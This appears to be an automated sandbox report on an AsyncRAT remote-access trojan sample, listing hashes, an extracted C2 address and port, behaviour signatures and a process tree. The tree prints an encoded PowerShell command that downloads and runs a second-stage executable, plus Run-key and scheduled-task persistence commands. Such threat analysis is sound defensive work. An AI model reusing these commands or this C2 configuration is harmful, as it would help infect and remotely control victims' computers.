asyncrat | 65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2

Analysis

max time kernel
135s
max time network
146s
platform
windows10-1703_x64
resource
win10-20220812-en
resource tags

arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system
submitted
25/12/2022, 07:27

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe
Size

5KB
MD5

8615a8a7fa0a063cd143c3d4f1252666
SHA1

f664d4e086ccb6703e2aba9c3361373fe990b84c
SHA256

65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2
SHA512

3a60a30bcc5b3de4d5342854ebed586e572b309185125efefba684c5451b482a822ca7e01d9640b7665b8ff2fb0ce7eb84f86b02b62833b01bdbd59fa875d5b2
SSDEEP

96:2OZZ79nSCFmOO0TUq8oftOENtUqXo8zntvngd3oj/rl:2Mp9nZFZnUq8okENtUqXLhgdE

Score

10^/10

asyncrat system guard runtime persistence rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/3492-207-0x000000000040D0EE-mapping.dmp	asyncrat
behavioral1/memory/3492-203-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
4	1112	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3900	2.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe"	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3900 set thread context of 3492	3900	2.exe	73

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4840	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
1112	powershell.exe
1112	powershell.exe
1112	powershell.exe
1524	powershell.exe
1524	powershell.exe
1524	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1112	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2780 wrote to memory of 1112	2780	65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe	66
PID 2780 wrote to memory of 1112	2780	65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe	66
PID 1112 wrote to memory of 3900	1112	powershell.exe	68
PID 1112 wrote to memory of 3900	1112	powershell.exe	68
PID 1112 wrote to memory of 3900	1112	powershell.exe	68
PID 3900 wrote to memory of 1524	3900	2.exe	69
PID 3900 wrote to memory of 1524	3900	2.exe	69
PID 3900 wrote to memory of 1524	3900	2.exe	69
PID 3900 wrote to memory of 4940	3900	2.exe	70
PID 3900 wrote to memory of 4940	3900	2.exe	70
PID 3900 wrote to memory of 4940	3900	2.exe	70
PID 3900 wrote to memory of 3492	3900	2.exe	73
PID 3900 wrote to memory of 3492	3900	2.exe	73
PID 3900 wrote to memory of 3492	3900	2.exe	73
PID 3900 wrote to memory of 3492	3900	2.exe	73
PID 3900 wrote to memory of 3492	3900	2.exe	73
PID 3900 wrote to memory of 3492	3900	2.exe	73
PID 3900 wrote to memory of 3492	3900	2.exe	73
PID 3900 wrote to memory of 3492	3900	2.exe	73
PID 4940 wrote to memory of 4840	4940	cmd.exe	74
PID 4940 wrote to memory of 4840	4940	cmd.exe	74
PID 4940 wrote to memory of 4840	4940	cmd.exe	74

C:\Users\Admin\AppData\Local\Temp\65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe
"C:\Users\Admin\AppData\Local\Temp\65dd5fbc588a39cc22d91923a4fbe3f3fca6fc964506470c6551f16ed89e3df2.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANQA1ADYAMAA0ADYANQA0ADQANAA2ADIAMgAzADMANwAwAC8AMQAwADUANQA2ADAANAA3ADkAMgAzADMAOAAxADYANQA4ADEAMAAvAEMAUgAuAGUAeABlACcALAAgADwAIwBnAHgAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAeQBwACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAbQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAKQA8ACMAZAB4AHMAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABkAHMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAcAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADIALgBlAHgAZQAnACkAPAAjAGMAaQBnACMAPgA="
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Users\Admin\AppData\Roaming\2.exe
    "C:\Users\Admin\AppData\Roaming\2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3900
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1524
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4940
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
        5⤵
        Creates scheduled task(s)
        
        PID:4840
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      #cmd
      4⤵
      PID:3492

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
11e537ee288bbd2405108159acc4266d

SHA1
341d4adb4316159bab7e0df160d679c4c0b96c5c

SHA256
7731c89a5b955c1b28cf3b830083446901ebdebd394b7dd5697a3979e1771d05

SHA512
cbc77113e4a320734be7131bbbe12dc9efbfc912af439cc1ec9a7346f67698a3352461393a3ccbf202eab40419b939df874ccfe17d035da20239cf949c5b9c78

Download Submit
C:\Users\Admin\AppData\Roaming\2.exe

Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
C:\Users\Admin\AppData\Roaming\2.exe

Filesize
87KB

MD5
3c6ccbfe897915f0fe6bc34d193bf4a0

SHA1
6fe3161ee66e317889066a302474e511220939e7

SHA256
52bf11364e8430f4b271ebb29e2a55451543338be5b2a34e731ede58eef04241

SHA512
e0bf1fc11deacb24b5d5de4bcfc522057d1ca1b4866325356b2c9a1f009c6562eee0c0e602478b3639de4beff14997d59a3b428281d9111278544fc5e3199536

Download Submit
memory/1112-122-0x000001B248440000-0x000001B248462000-memory.dmp

Filesize
136KB

Download
memory/1112-126-0x000001B248F90000-0x000001B249006000-memory.dmp

Filesize
472KB

Download
memory/1524-330-0x0000000007ED0000-0x0000000007F36000-memory.dmp

Filesize
408KB

Download
memory/1524-212-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-580-0x00000000073C0000-0x00000000073DA000-memory.dmp

Filesize
104KB

Download
memory/1524-370-0x0000000009C30000-0x0000000009CC4000-memory.dmp

Filesize
592KB

Download
memory/1524-363-0x0000000009A20000-0x0000000009AC5000-memory.dmp

Filesize
660KB

Download
memory/1524-354-0x00000000098B0000-0x00000000098CE000-memory.dmp

Filesize
120KB

Download
memory/1524-353-0x00000000098F0000-0x0000000009923000-memory.dmp

Filesize
204KB

Download
memory/1524-340-0x0000000008820000-0x0000000008896000-memory.dmp

Filesize
472KB

Download
memory/1524-336-0x0000000008A50000-0x0000000008A9B000-memory.dmp

Filesize
300KB

Download
memory/1524-335-0x0000000007FF0000-0x000000000800C000-memory.dmp

Filesize
112KB

Download
memory/1524-603-0x0000000009C10000-0x0000000009C2A000-memory.dmp

Filesize
104KB

Download
memory/1524-331-0x0000000008120000-0x0000000008470000-memory.dmp

Filesize
3.3MB

Download
memory/1524-329-0x0000000007E60000-0x0000000007EC6000-memory.dmp

Filesize
408KB

Download
memory/1524-327-0x0000000007DC0000-0x0000000007DE2000-memory.dmp

Filesize
136KB

Download
memory/1524-604-0x0000000009CD0000-0x0000000009CF2000-memory.dmp

Filesize
136KB

Download
memory/1524-304-0x0000000007760000-0x0000000007D88000-memory.dmp

Filesize
6.2MB

Download
memory/1524-190-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-292-0x0000000004D50000-0x0000000004D86000-memory.dmp

Filesize
216KB

Download
memory/1524-195-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-192-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-197-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-209-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-202-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-204-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-585-0x00000000073B0000-0x00000000073B8000-memory.dmp

Filesize
32KB

Download
memory/1524-206-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/1524-205-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/2780-116-0x0000000000010000-0x0000000000018000-memory.dmp

Filesize
32KB

Download
memory/3492-213-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3492-210-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3492-203-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/3900-161-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-159-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-179-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-180-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-181-0x0000000005990000-0x0000000005E8E000-memory.dmp

Filesize
5.0MB

Download
memory/3900-182-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-183-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-184-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-185-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-186-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-187-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-188-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-177-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-176-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-143-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-175-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-174-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-201-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-145-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-173-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-172-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-171-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-170-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-169-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-168-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-211-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-167-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-166-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-165-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-146-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-164-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-199-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-148-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-147-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-163-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-194-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-149-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-162-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-160-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-178-0x0000000000D30000-0x0000000000D4C000-memory.dmp

Filesize
112KB

Download
memory/3900-158-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-157-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-156-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-155-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-154-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-153-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-151-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/3900-150-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/4940-196-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/4940-198-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/4940-208-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/4940-200-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download
memory/4940-193-0x0000000076FB0000-0x000000007713E000-memory.dmp

Filesize
1.6MB

Download